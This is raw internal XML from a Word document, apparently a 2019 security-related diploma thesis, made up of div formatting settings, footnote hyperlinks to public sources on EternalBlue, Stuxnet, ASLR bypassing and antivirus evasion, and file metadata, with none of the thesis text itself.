        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="963001526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1111780131">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1175266090">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1183469808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1224952819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1345746069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1355688607">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1359161380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1366444222">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1424570061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1477602069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1493715095">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1495299979">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1557817574">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1580944495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1601840061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1615596466">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655143544">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1668971779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1736858933">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1825273741">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1834561356">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1900095894">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1913545249">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1918854171">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1955861132">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="824660367">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1192914149">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="82929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20684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1966961047">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1977832362">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1774591171">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1451781857">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="17924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45753">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2010595545">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2012638635">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2027362198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2108425154">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2116635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we.mitre.org/data/definitions/242.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github.com/loosper/diploma" TargetMode="Externa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netmarketshare.com/operating-system-market-share.aspx" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/35742570/why-is-the-loop-instruction-slow-couldnt-intel-have-implmented-it-efficiently" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/eternalblue-everything-know/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Stuxnet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/dam/m/hu_hu/campaigns/security-hub/pdf/acr-2018.pdf" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2017/05/an-nsa-derived-ransomware-worm-is-shutting-down-computers-worldwide/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-europe-09/Fritsch/Blackhat-Europe-2009-Fritsch-Bypassing-aslr-whitepaper.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1256.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://idafchev.github.io/research/2019/01/23/beating_defender.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.osdev.org/System_V_ABI" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.osdev.org/System_V_AB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6AB7D-BBE5-451C-B530-370D9C663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7</Pages>
  <Words>18898</Words>
  <Characters>107719</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osper</dc:creator>
  <cp:lastModifiedBy>Loosper</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2019-02-28T08:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-11T08:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-15T11:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>